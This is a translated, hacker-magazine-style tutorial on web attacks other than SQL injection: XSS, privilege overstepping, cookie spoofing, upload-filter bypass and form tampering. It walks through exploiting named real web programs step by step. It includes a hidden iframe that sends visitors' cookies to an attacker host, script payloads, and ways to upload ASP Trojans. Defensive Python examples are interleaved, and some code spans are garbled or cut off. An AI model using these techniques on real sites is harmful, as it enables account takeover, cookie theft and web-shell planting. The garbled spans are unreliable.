Research on the exploitation of non-SI (non-SQL-injection) vulnerabilities in Web programs

Part I Preface
The most popular way of attacking web sites today is SQL injection (SI). SI techniques are easy to learn and use and readily yield a high level of access, but precisely because they are so well known, any programmer with a little security awareness now watches for the problem; moreover, data submitted by the GET method is recorded in the server logs, which makes it easy for the administrator to find the intruder.
Non-SI attacks generally give less access to server operations, but they are useful for intrusion purposes where access to data is the goal.
Part II Method Introduction
Conventional non-SI attacks fall into the following types:
I. Cross-site scripting attacks (XSS)
Cross-site scripting attacks do not directly damage the Web server; their main target is the site's visitors. The intruder generally has one of three purposes:
The first is to harm the visitor's browser: for example, by adding automatic download code to the web page, using browser holes such as the IE frame vulnerability to plant a Trojan, or hijacking the browser.
The second is to steal visitors' cookies. The intruder sets up a page on his own server that accepts and saves information, and adds to a page of the compromised site a hidden iframe with width and height 0 pointing at http://hackerserver.com/get.asp?info=Document.cookies; the server-side get.asp page receives the info parameter and stores it in a database, so the intruder collects the cookies of every visitor to the compromised site. If what is stolen is an ordinary user's password the harm is not great, but if the intruder uses social engineering to get an administrator, whose login name and password are stored in cookies, to visit the page, he can steal the administrator's password and go on to control the site.
The third is to use the requests of a large number of visitors to repeat an operation. Some time ago a business news site reported that a well-known search engine had added to its search-alliance pages a hidden iframe pointing at the business site, in effect a DDoS attack that overloaded its server. Whether or not this story is true, the idea is one we should pay attention to. In issue 11 of Hacker X Files for 2004 there was an article, "Playing the X-Tree" (page 62), in which the author used a cross-site scripting attack to insert posting code into a page; the number of spam posts skyrocketed and the server was pushed close to collapse.
Cross-site attacks look simple, but bypassing the program's filtering of illegal characters is complicated: it is not enough to simply add dangerous code to the content you submit (such as a comment). Commonly used means are changing case, converting to ASCII codes or escape characters, calling remote JS script files and other deformation and hiding methods, and using the getURL parameter of Flash.
Little Trick
1. How to deal with form-side detection.
To prevent cross-site scripting, some websites add JavaScript to the form that checks the text box values, pops up a dialog if a value is not legitimate, and blocks submission. A limit imposed on the client is worth nothing: we can save the page locally, remove the detection JS, change the form's action attribute so that it points back at the site, and submit; if the site does not verify again on the server side, it is compromised. (This hole exists in the Information Technology Examination Program for high school students in Hebei province.)
2. About UBB.
UBB code lets a program restrict HTML without making submitted content too monotonous: the user writes a few specific tags and the server converts them. It still poses a risk if the conversion code is not written carefully. (A way around UBB is shown in a later example.)
Below, follow me through some examples:
Example 1-1: Unfiltered script insertion
This is the "Customer feedback" function of one version of a mobile mall program; the page is fk.asp, which posts to itself. The code that stores the data in the database looks like this:

Rs.AddNew
Rs("fksubject") = CheckFFSqlStr(Trim(Request("fksubject")))
Rs("fkleixing") = CheckFFSqlStr(Request("fkleixing"))
Rs("fkcontent") = CheckFFSqlStr(Trim(Request("fkcontent")))   ' Look: no dangerous-character filtering
Rs("fkusername") = CheckFFSqlStr(Trim(Request("fkusername")))
Rs("fkemail") = CheckFFSqlStr(Trim(Request("fkemail")))
Rs("fktel") = CheckFFSqlStr(Trim(Request("fktel")))
Rs("fklaizi") = CheckFFSqlStr(Trim(Request("fklaizi")))
Rs("fkdate") = Now
Rs("fkip") = Request.ServerVariables("REMOTE_ADDR")
Rs.Update
Rs.Close
It is not hard to see that before the data is put into the database the program filters only the characters that make up SI (a filter that is not even necessary here, since these parameters are not used in query conditions); dangerous characters such as script tags are not filtered, and the display page lyb.asp does not filter them before displaying either. If we submit <script>alert(document.cookie)</script> in the message, the user's cookie information pops up. (As shown in figure I.)
Example 1-2: Badly filtered UBB script insertion
The UBB conversion page ubbcode.asp of a famous blog program converts dangerous characters with a fragment like the following:


str = Replace(str, "script", "script")   ' (the arguments of these four Replace calls were garbled when this page was extracted)
str = Replace(str, "script", "script")
str = Replace(str, "script", "script")
str = Replace(str, "script", "script")
We can submit obfuscated forms of the word script to get around this restriction, for example:

[img]javascript:window.close () [/IMG] (remove space)
You can close the window.
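As an added example (not code from the mobile mall or the blog program discussed above), here is the defensive counterpart to examples 1-1 and 1-2 in Python: every submitted character is HTML-escaped before display, and the UBB [img] tag is rebuilt from an allowlist of URL schemes instead of a blocklist of words, so case changes and embedded whitespace no longer help. The sample inputs are constructed for this illustration.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample submissions (not taken from the page); the second
# mimics the spaced-out "java script:" style payload the article describes.
SAMPLES = [
    "Hello <script>alert(document.cookie)</script>",
    "[img]java\tscript:window.close()[/img]",
    "[img]http://example.test/pic.png[/img]",
    "[IMG]HTTP://example.test/a.png[/IMG]",
]

IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)
ALLOWED_SCHEMES = {"http", "https"}  # allowlist: anything else is dropped


def safe_image_url(raw):
    """Return the URL if its scheme is http/https, otherwise None.

    Whitespace and control characters are stripped first, because browsers
    ignore them inside a scheme; that is exactly why a word blocklist
    ("script") can be beaten by inserting a space or a tab.
    """
    cleaned = "".join(ch for ch in raw if ch.isprintable() and not ch.isspace())
    parts = urlsplit(cleaned)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return cleaned


def render_ubb(text):
    """Escape everything the user sent, then re-introduce only the HTML we
    generate ourselves for [img] tags whose URL passed the allowlist."""
    escaped = html.escape(text, quote=True)

    def repl(match):
        # The URL was escaped along with the rest; undo that for checking,
        # then escape again when emitting it inside an attribute.
        url = safe_image_url(html.unescape(match.group(1)))
        if url is None:
            return "[img removed: disallowed URL]"
        return '<img src="%s">' % html.escape(url, quote=True)

    return IMG_TAG.sub(repl, escaped)


if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample), "->", render_ubb(sample))
```

The order matters: escaping first and then generating markup means the only HTML that ever reaches the page is what render_ubb itself wrote, so there is nothing for case tricks or remote script includes to target.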

II. Ultra vires (privilege-overstepping) attacks
An ultra vires attack exploits incomplete checking of who may access a page: an intruder can reach pages meant only for a specific user or for the administrator without obtaining that user's or the administrator's password.
This reminds me of the "chat room NPC kick" trick popular a long, long time ago (around 2000): chat room programs checked the permissions of certain users incorrectly on the page responsible for kicking people out, so anyone could kick anyone.
Administrator-level holes of this kind are usually rather hidden, especially in closed-source programs, and mostly one can only guess from experience. A more common example concerns user rights: a page for modifying user data takes a GET parameter to decide which record to process and display, such as Http://targetzone.com/edituser.asp?userid=Daniel, intended to modify Daniel's data. If the program does no other validation, we can change the parameter value and modify any user's data, for example submitting http://targetzone.com/edituser.asp?userid=Kitty to modify Kitty's information.
When producing such a program the programmer should check the session to determine whether the user is logged in, and should take the current login name from the session; GET and cookie data are not trustworthy.
Another kind of ultra vires we may call "step-over". It affects processes that need N steps: if step X does not check that step X-1 was completed, the attacker can skip the first X-1 steps. It often occurs in password-recovery functions: the final page that sets the password carries the user name only in a hidden field, and since the last step does not check anything else, any user's password can be changed.
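The following Python sketch is an added example, not the mall program's code, of how the two checks recommended above look in practice: the profile editor takes the account from server-side session state and ignores any userid parameter, and the password-reset flow records on the server which step has been completed and which account the reset belongs to, so a client-supplied hidden username field has no effect. The user table, the security answers and the session store are all constructed in memory for the illustration.

```python
import secrets

# Constructed in-memory stand-ins for the user table and server-side state
# (not the mall program's own storage).
USERS = {
    "Daniel": {"answer": "blue", "password": "old-d"},
    "kitty":  {"answer": "red",  "password": "old-k"},
}
SESSIONS = {}   # session id -> logged-in user name
RESETS = {}     # reset token -> {"user": ..., "stage": 1 or 2}


def login(username):
    """Issue an opaque session id; the identity lives on the server."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = username
    return sid


def edit_profile(sid, form):
    """Profile editor: the account to modify comes from the session.
    A userid parameter in the form or query string is deliberately ignored,
    which closes the edituser.asp?userid=... hole."""
    user = SESSIONS.get(sid)
    if user is None:
        return "not logged in"
    USERS[user]["email"] = form.get("email")
    return "updated " + user


def start_reset(username):
    """Step 1: bind a reset token to the account on the server side."""
    if username not in USERS:
        return None
    token = secrets.token_urlsafe(16)
    RESETS[token] = {"user": username, "stage": 1}
    return token


def answer_question(token, answer):
    """Step 2: only a token at stage 1 may advance, and only with the
    right answer for the account the token was bound to."""
    entry = RESETS.get(token)
    if entry is None or entry["stage"] != 1:
        return False
    if not secrets.compare_digest(answer, USERS[entry["user"]]["answer"]):
        return False
    entry["stage"] = 2
    return True


def set_new_password(token, form):
    """Step 3: refuses unless step 2 was completed for this token, and
    writes the password of the server-bound account, not of whatever
    hidden 'username' field the client sent."""
    entry = RESETS.get(token)
    if entry is None or entry["stage"] != 2:
        return False
    del RESETS[token]                # one-shot token
    USERS[entry["user"]]["password"] = form["passwd"]
    return True
```

The token is what ties the three pages together; because the account name and the completed stage are stored next to it on the server, editing the saved page of step 3 to name another user changes nothing.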
Little Trick
1. The use of hidden fields.
Many programmers like to use hidden form fields instead of passing arguments explicitly between the steps of a program. For some data this saves server resources, but it is very dangerous for sensitive data: although the user does not see hidden fields on the page, he can view the source to find them, save the page locally, modify the hidden value, and thereby overstep his rights.
OK, let's look at a few examples:
Example 2-1: Step-over hole in the password-retrieval function of one version of the mobile mall
This version of the Dynamic Mall has many holes. Its password-recovery function is split over four pages, getpwd.asp to getpwd4.asp, which respectively fill in the user name, answer the password question, reset the password, and write the new password to the database. Part of getpwd4.asp reads:


<%
username = Request("username")
passwd = MD5(Trim(Request.Form("passwd")))
Set Rs = Server.CreateObject("ADODB.Recordset")
sql = "SELECT * FROM [user] WHERE username='" & username & "'"
Rs.Open sql, conn, 1, 3
If Rs.EOF Then
%>
<script language="javascript">
alert("This user has not yet registered, please register on the homepage!")
location.href = "javascript:history.back()"
</script>
<%
Else
    Rs("userpassword") = passwd
    Rs.Update
End If
Rs.Close
Set Rs = Nothing
Conn.Close
Set Conn = Nothing
%> .....
You can see that the first line does not check whether the request data belongs to the user who filled in the earlier steps.
Suppose we want to steal a user's password. Register a new user, Daniel, and note the answer to the question; then go through password recovery up to getpwd3.asp, save that page locally, open it in Notepad, change Daniel to kitty in the form's action attribute, complete the URL, open the page locally, fill in a password and submit: Kitty's password is now the one you just entered on this page.
Example 2-2: Ultra vires hole in Nine Cool Network Personal Homepage Space Management System 3.0
The program detects whether the user is logged in through the include file chkuser.asp:


<%
If Session("user_userid") = "" Or Session("user_username") = "" Then   ' vulnerability reason
    Response.Write "<script>alert('Sorry, you have not logged in or the login is wrong!');top.location.href='index.asp'</script>"
    Response.End
End If
%>
As you can see, this file only checks whether the session is empty; it does not check whether the operation belongs to the currently logged-in user! So this program has a number of ultra vires holes. First, the hole that lets a user modify another user's data: after logging in, the interface is divided into top, left and right frames. The top frame holds a few navigation links; shift-clicking "modify profile" opens it in a new window at the address Http://127.0.0.1/edituser.asp?userid=39&username=Daniel. It is not hard to see that the username parameter in the address is the current user name, so let's try changing it... Open the page http://127.0.0.1/edituser.asp?userid=39&username=kitty, and bingo! The page displays the information of the Kitty user we registered. Change it at will... Here we can modify the password question and answer, and then change the user's password through the "Forgotten password" feature. Next, the hole that lets anyone display and modify any user's files: on inspection, the page responsible for displaying the file list is Http://127.0.0.1/main.asp?userid=39&username=Daniel&path=Daniel, and by modifying the value of path we can browse, upload, delete and rename files on the server.
Example 2-3: LB5000 "modify registration statement" hole
Because the two files setregmsg.cgi and setregrules.cgi in Rei LB5000 have an ultra vires hole, an attacker can directly modify the forum's "registration statement" and "SMS welcome message". Submitting the following request modifies the registration statement: http://www.targetzome.com/cgi-bin/setregrules.cgi?action=process&therules=whatever you want it to say. Cross-site code can be written in through this.
III. Cookie spoofing
What are cookies? A cookie is a text file stored in the browser directory that records information about your visits to a specific site and can only be read back by the site that created it; it is about 255 characters and occupies only 4KB of disk space. While the user is browsing the site it is held in the client's memory, and after the browser exits it is stored on the user's hard disk. Most of what cookies store is ordinary, such as records of keystrokes and the addresses visited, but many Web sites use cookies to store personal data such as passwords, user names and credit card numbers.
Cookie spoofing means reading the site's cookies on the client, modifying them to the values we want, and fooling the program into believing we are a logged-in user in order to achieve some purpose; it can be considered another way of overstepping authority.
Again, some programmers do not estimate the risk, trust the client too much, and store in cookies sensitive information that should be kept in the session; that is what causes this hole, which is relatively hidden.
The general idea of such an attack is: obtain a legitimate cookie -> modify the cookie with a tool -> access the restricted page, and the limit is exceeded.
Suppose we have a legitimate account Daniel on the site http://targetzone.com and want to log in as the user kitty, but we don't have Kitty's password (obviously, or why attack...). We try to reach the goal by cookie spoofing:
Log in to targetzone.com as Daniel, choosing to save the login data, close the browser, open the local cookie store with the IECookiesView software, select the site targetzone.com, change the username value to Kitty, visit the website again, and find that we are logged in as Kitty.
This kind of attack has a rather big drawback, quite apart from whether the site keeps such information in cookies at all: some sites keep the user name and password together in the cookie and check both on every access to judge whether it is legal. So this hole is not very effective on its own, but is much better combined with other intrusion methods. For example, a site's database has been downloaded but the passwords are MD5 encrypted; unless the MD5 hashes are cracked by brute force one cannot log in, but if the site stores the user name and MD5 password in cookies, the hash can be used directly. Or the site's anti-SI measures are strict and no injection point can be found in the URL, but one can be found in the cookies. Some Web sites also put the user's permissions in cookies, which can be modified to elevate privileges.
Example 3-1: Spoofing hole in a download program
The code that handles the login is this:


<%If Request.Cookies("down_isadder") = "" Then%>
<script language="vbscript">
MsgBox("Sorry, you do not have permission to manage users! If you are an administrator, please log in!")
window.close()
</script>
<%Else%>
............
Really dizzying: it only checks that the cookie is not empty, so using IECookiesView to change the value of down_isadder to any value (except, of course, an empty one) logs us into the management interface.
Example 3-2: L-Blog cookie ultra vires upload spoofing hole
This recent hole really devastated weblogs, including those of many hackers. L-Blog's cookie-extraction file has a logical flaw that allows any user to upload files with administrator privileges.
Part of the code of the file attachment.asp:
If memstatus = "supadmin" Or memstatus = "Admin" Then
    If Request.QueryString("action") = "Upload" Then
You can see that the program checks whether memstatus has the administrator value, and if so allows the upload, without checking which user is logged in. Now look at command.asp, which verifies the cookies: it checks whether MemName (the user name obtained from the cookie) is empty, and if so does nothing; if it is not empty, it verifies that the saved user name and password are correct, and if not, clears the cookies. This leaves a hole: if the user name value (memname) in the cookie is empty while the user-rights value (memstatus) is not, command.asp does not verify the user name and password, but the upload page sees that memstatus is the administrator, and the upload is allowed.
We can register an ordinary user, log in, save the cookies, modify them so that MemName is empty and memstatus is supadmin or admin, and then upload.
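The following Python is an added example, not L-Blog's code; it reproduces the decision logic the text describes for command.asp and attachment.asp (a role value read from the cookie, with the password check skipped when the user name is empty) beside a session-based version in which the cookie carries only an opaque identifier and the role is looked up on the server. User records and passwords are constructed for the illustration; MD5 is used only because the article's programs store MD5 password hashes.

```python
import hashlib
import secrets

# Constructed sample accounts (not L-Blog's data). MD5 appears only because
# the article's programs store MD5 password hashes.
USERS = {
    "daniel": {"pw_md5": hashlib.md5(b"s3cret").hexdigest(), "status": "member"},
    "root":   {"pw_md5": hashlib.md5(b"adm1n").hexdigest(),  "status": "supadmin"},
}
ADMIN_ROLES = ("supadmin", "admin")


def can_upload_cookie_trusting(cookies):
    """The logic the text describes for command.asp + attachment.asp:
    the password is verified only when memname is non-empty, and the
    role is taken straight from the memstatus cookie."""
    memname = cookies.get("memname", "")
    memstatus = cookies.get("memstatus", "")
    if memname != "":
        user = USERS.get(memname)
        if user is None or user["pw_md5"] != cookies.get("mempwd", ""):
            return False
    return memstatus in ADMIN_ROLES


SESSIONS = {}   # opaque session id -> user name, kept on the server


def login(username, password):
    """Verify credentials once and hand out a random session id; nothing
    about identity or role is ever written into the cookie."""
    user = USERS.get(username)
    digest = hashlib.md5(password.encode()).hexdigest()
    if user is None or not secrets.compare_digest(user["pw_md5"], digest):
        return None
    sid = secrets.token_hex(16)
    SESSIONS[sid] = username
    return sid


def can_upload_session_based(cookies):
    """Role comes from the server-side record the session id points to;
    an empty or forged cookie can only produce 'no session'."""
    username = SESSIONS.get(cookies.get("sid", ""))
    if username is None:
        return False
    return USERS[username]["status"] in ADMIN_ROLES
```

With the cookie-trusting check, a cookie that names no user but claims supadmin passes; with the session-based check the same cookie simply has no session, and the role can only be the one recorded at login.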
But only a few file types can be uploaded; we cannot upload an ASP Trojan. What to do... Let's look at how an ASP Trojan gets uploaded.
IV. Illegal upload holes
To turn legal into illegal, let's start with two simple holes.
Some programs restrict extensions such as asp and asa, but look at the IIS settings: some other extensions, such as cer, are also handled by asp.dll. So if a program does not allow ASP files to be uploaded, we can rename the Trojan to .cer and upload it; if the server has not removed the cer mapping, the Trojan runs. There are also extensions that execute SSI (Server Side Include) directives, such as stm: upload a file seeit.stm containing <!--#include file="conn.asp"--> and then access it to see the contents of conn.asp. So when checking uploads, programmers should specify which kinds of file are allowed, not which kinds are forbidden.
Next, the bugs in upload programs themselves.
A while ago the Dynamic Network forum upload hole was a real storm; Daniel himself used this hole to attack quite a few "chickens". Let's first analyze the Dynamic Network upload:
The Dynamic Network forum does not allow uploading ASP and other dangerous files, but its upload processing has a hole that causes the program to obtain the wrong parameter, so intruders can upload arbitrary files.
First look at the page that submits the upload, reg_upload.asp:


<form name="form" method="post" action="upfile.asp" enctype="multipart/form-data">
<input type="hidden" name="filepath" value="uploadface">
<input type="hidden" name="act" value="upload">
<input type="file" name="file1">
<input type="hidden" name="fname">
<input type="submit" name="submit" value="Upload" onclick="fname.value=file1.value; parent.document.forms[0].submit.disabled=true; parent.document.forms[0].submit2.disabled=true;">
</form>
The procedure extracts the values of the file1 and fname form fields and judges them. That is, uploading an ASP file directly from the page is detected. However, we can construct our own request and submit it with NC to bypass that check. The main problem remains that the saved file must end up with an ASP extension: the value of file1 is legitimate, so how can the saved extension be asp?
There is one line in the component-less upload class used by Dynamic Network:


FileName = FormPath & Year(Now) & Month(Now) & Day(Now) & Hour(Now) & Minute(Now) & Second(Now) & RanNum & "." & FileExt
This FileName is the name under which the program saves the file. When a computer processes a string, it looks for a terminating character and considers the string finished when it meets one. So when constructing the save path for the uploaded file, we only need to trick the computer into thinking the path parameter ends after something like "Uploadfacedaniel.asp" to reach our goal.
The principle of this hole is analyzed only briefly here; many upload programs have the same hole. Capturing packets and submitting by hand is too tiring; Daniel suggests that you use one of the upload-hole tools on the Internet to reduce the burden.
Now look at a hole in MyPower 3.51. Part of the code of its upload page upfile_soft.asp reads:


For i = 0 To UBound(ArrUpFileType)
    If FileExt = Trim(ArrUpFileType(i)) Then
        EnableUpload = True
    End If
Next
Because the MyPower upload class can upload multiple files, it can be seen from the code above that if multiple files are uploaded and the first N-1 have illegitimate extensions while the Nth is valid, the check is passed. So we just build our own page, upload two files, with the second having an extension the program allows, and that's it. However, MyPower forbids forms submitted from outside; how to get around that limit is in section V, Attack and defense of forms.
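Added example, not the Dynamic Network or MyPower upload class: a Python validator that applies the three lessons of this section. Extensions are allowlisted rather than blocklisted (so cer and stm never pass), a client file name containing a NUL or other control character is rejected instead of being truncated, the saved name is generated entirely on the server, and in a multi-file upload each file is judged separately so that one legal extension cannot carry the others. The allowed extensions and the upload root are assumptions of the example.

```python
import re
import secrets
from datetime import datetime

# Assumptions of this example: an allowlist of image extensions and a
# fixed upload directory chosen by the server.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "gif", "png"}
SAFE_BASENAME = re.compile(r"[A-Za-z0-9_.-]+")


def check_extension(client_name):
    """Return the lower-cased extension if the client file name is
    acceptable, else None.

    Only the final path component is considered; a NUL, other control
    character or anything outside the safe character set rejects the
    name outright instead of being silently truncated; and the extension
    is whatever follows the LAST dot, so 'x.jpg.asp' is an asp file.
    """
    base = client_name.replace("\\", "/").rsplit("/", 1)[-1]
    if not base or "." not in base or SAFE_BASENAME.fullmatch(base) is None:
        return None
    ext = base.rsplit(".", 1)[1].lower()
    return ext if ext in ALLOWED_EXTENSIONS else None


def server_side_name(ext, upload_root):
    """Like the timestamp-plus-random scheme in the upload class, except
    that the client contributes nothing to the directory or the name."""
    stamp = datetime.now().strftime("%Y%m%d%H%M%S")
    return "%s/%s%s.%s" % (upload_root.rstrip("/"), stamp, secrets.token_hex(4), ext)


def accept_batch(client_names):
    """Judge every file of a multi-file upload on its own. Returns
    (all_ok, {name: extension-or-None}); one legal file never 'covers'
    the others, unlike a flag that is set and never cleared."""
    results = {name: check_extension(name) for name in client_names}
    return all(ext is not None for ext in results.values()), results
```

Note that check_extension never tries to "clean" a bad name into a good one: a name that fails is refused, because the path the program later builds must contain nothing the client chose.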
Little trick:
1. Using the database backup and restore function to turn legal into illegal.
After all, many systems do not have the upload logic holes above, so how do we upload a script Trojan? This trick requires logging in to the back end, and the site system must have the ability to back up and restore the database. Upload the Trojan through the legal channel, renamed with a legitimate extension; then, on the backup-and-restore page, enter the uploaded file's name as the backup-and-restore path and restore. Because the program stores the database under the asp extension, the Trojan is parsed normally.
V. Attack and defense of forms
Earlier parts of this article mentioned some of the unsafe aspects of forms; let's summarize. The main idea of a form attack is to save the page containing the form locally, modify it to remove the restrictions, point the action at the address on the Web site, and submit.
So it is not hard to see that everything about a form, if not validated again on the server side, is dangerous and untrustworthy. Programmers are advised to check the legality of the form on the client, verify it again on the server side, and add the corresponding code on the server to forbid submissions from outside the site:


<%
server_v1 = CStr(Request.ServerVariables("HTTP_REFERER"))
server_v2 = CStr(Request.ServerVariables("SERVER_NAME"))
If Mid(server_v1, 8, Len(server_v2)) <> server_v2 Then
    Response.Write "<br><br><center><table border=1 cellpadding=20 bordercolor=black bgcolor=#eeeeee width=450>"
    Response.Write "<tr><td style='font:9pt Verdana'>"
    Response.Write "You have submitted from a wrong path. Submitting data from outside the site is prohibited; please do not tamper with this parameter!"
    Response.Write "</td></tr></table></center>"
    Response.End
End If
%>
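The following Python is an added example, not the mall or forum code, of the server-side check the paragraph recommends. Two things differ from the Mid(server_v1, 8, Len(server_v2)) comparison above: the Referer host is parsed and compared exactly (the fixed-offset prefix comparison rejects legitimate https:// submissions and accepts any host whose name merely begins with the site name), and because the Referer is set by the client, a per-session form token stored on the server is the check that actually decides; the Referer is only a secondary signal. The host name and session identifiers are assumed values.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_HOST = "targetzone.com"    # assumed host name of our own site
FORM_TOKENS = {}                # session id -> token issued with the form


def referer_is_local(referer):
    """Parse the Referer and compare the host name exactly.

    The Mid(server_v1, 8, Len(server_v2)) check compares a fixed-offset
    prefix: an 'https://' Referer shifts the offset and fails, while any
    host that merely begins with the site name passes. Parsing avoids both.
    """
    if not referer:
        return False
    host = urlsplit(referer).hostname   # already lower-cased by urlsplit
    return host is not None and host == SITE_HOST.lower()


def issue_form_token(session_id):
    """Generate a token when rendering the form and embed it as a hidden
    field; the copy kept here on the server is the one that counts."""
    token = secrets.token_urlsafe(24)
    FORM_TOKENS[session_id] = token
    return token


def submission_allowed(session_id, form):
    """The token, stored on the server and compared in constant time, is
    the decision; the Referer (client-controlled, often absent) is only
    worth logging, so it is not part of this result."""
    expected = FORM_TOKENS.get(session_id)
    submitted = form.get("form_token", "")
    return expected is not None and hmac.compare_digest(expected, submitted)
```

A page saved locally and re-pointed at the site still carries the hidden token it was rendered with, but only for the session that received it; a form built by someone else, or submitted with another session, has no matching token on the server.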

Let's think about what kinds of form restrictions exist: JS legality checks, hidden fields, and read-only (ReadOnly) fields.
Do you still remember the forum groups of the Ofstar Forum? A readonly field displayed the members of a group; we could download the page, remove the ReadOnly attribute, fill in the members we wanted to join the forum, and submit...
Little trick:
1. Bypassing the ban on external submissions:
You can write a socket program that sets the Http_referer value, but that is more trouble; here is a simple method.
This trick requires that you have permission to upload images. When IE opens a picture whose content is actually HTML, it runs the code as if it were a Web page. So we can convert the page into an "image", upload it, access it and submit: the submission now comes from the server side. (Note: this method requires writing all the underlying tags, such as
Example 5-1: Nine Cool Network Personal Homepage Space Management System 3.0 upload-to-any-directory hole
After logging in, click the "Upload File" button; a page pops up in which the number of uploads can be set, and there is a text box for the upload directory that cannot be modified in IE. Save this page, then find line 44 of the file, whose code is: <LI> uploaded to: <input class=input style="width:200px" ReadOnly ... Delete this readonly, then find line 37 of the file and complete the value of the action attribute of the form tag (that is, add the site address). Now open the page locally; the "upload to" text box can be modified, and we change it to: ... /, select a file and upload, and find that the file has been uploaded to the directory one level up.

VI. Database-path disclosure (%5c "Bauku") and file disclosure holes
We've all heard of the %5c Bauku hole: on a page that operates on the database, change the "/" closest to the file name in the address bar to "%5c", and if the following conditions are met you see the path of the database. The usual error page is a local one provided by IE, so first turn off the friendly error page, in Tools -> Internet Options -> Advanced -> "Show friendly HTTP error messages"; the other side's database must be of Access type; %5c Bauku needs a second-level directory and does not work in a first-level directory; and the other side's page has no error-handling statements. The principle is more complicated; please google it yourself.
Some programmers like to give include pages the .inc extension, and many tutorials recommend it, but this opens a big hole, because .inc is not handled by asp.dll by default and is displayed directly as text. If someone can access your database-definition page (such as conn.inc), the database address or the password of the SQL account is revealed.
Some Web sites prevent hotlinking of downloads by reading the software file in a page and streaming it to the client; the file name parameter is usually attached to the address by GET, such as http://targetzone.com/down.asp?path=Daniel.zip. We can roughly guess the location of the database connection file relative to the software library and change the value of the path parameter; with luck, we can download the database connection file without it being parsed by asp.dll.
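As an added example (not any download program's own code), here is a Python resolver for a path parameter like the one in down.asp above: it joins the parameter onto a fixed library root, normalises the result, and refuses anything that resolves outside that root, contains a NUL, or is not a permitted archive type. The root directory and the permitted extensions are assumptions, and the paths are POSIX style.

```python
import os

LIBRARY_ROOT = "/srv/downloads"              # assumed software library root
ALLOWED_SUFFIXES = (".zip", ".rar", ".exe")  # assumed download types


def resolve_download(path_param, root=LIBRARY_ROOT):
    """Map the path parameter to a file inside root, or return None.

    - a NUL would truncate the name in lower-level APIs, so it is refused;
    - join + normpath collapses any '..' the client added, and an absolute
      parameter replaces root entirely, which the next check catches;
    - commonpath proves the result still lies under root;
    - an extension allowlist keeps conn.asp and friends unreachable even
      if they were placed inside the library directory.
    """
    if "\x00" in path_param:
        return None
    candidate = os.path.normpath(os.path.join(root, path_param))
    if os.path.commonpath([root, candidate]) != root:
        return None
    if not candidate.lower().endswith(ALLOWED_SUFFIXES):
        return None
    return candidate
```

Serving the file from the returned path (rather than from the raw parameter) is what makes the check meaningful; the raw parameter should never reach the file-opening call.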
Part III Summary and Postscript
It is early morning and the sun is rising; this article, which took about three days of spare time, basically ends here. I want to emphasize that the non-SI holes in Web site programs are far more than these, and many unknown logical holes have not yet been found; because of space and time constraints this topic only gave a simple introduction to a few of the more commonly used methods at present. I hope Daniel can be of some use to everyone; if you really study the code of some online programs seriously, you will find holes that nobody has found yet.
Holes are not terrible; what is terrible is a programmer without a rigorous attitude and complete, thoughtful thinking.
Old Potato once asked me how I came to think about this subject. In fact I just feel deeply regretful and worried about the behaviour of rookies (including myself) who attack random sites with NBSI. Hackers who only use tools are not hackers; we must learn to use our own ideas to find and fix holes in order to achieve real technical improvement.
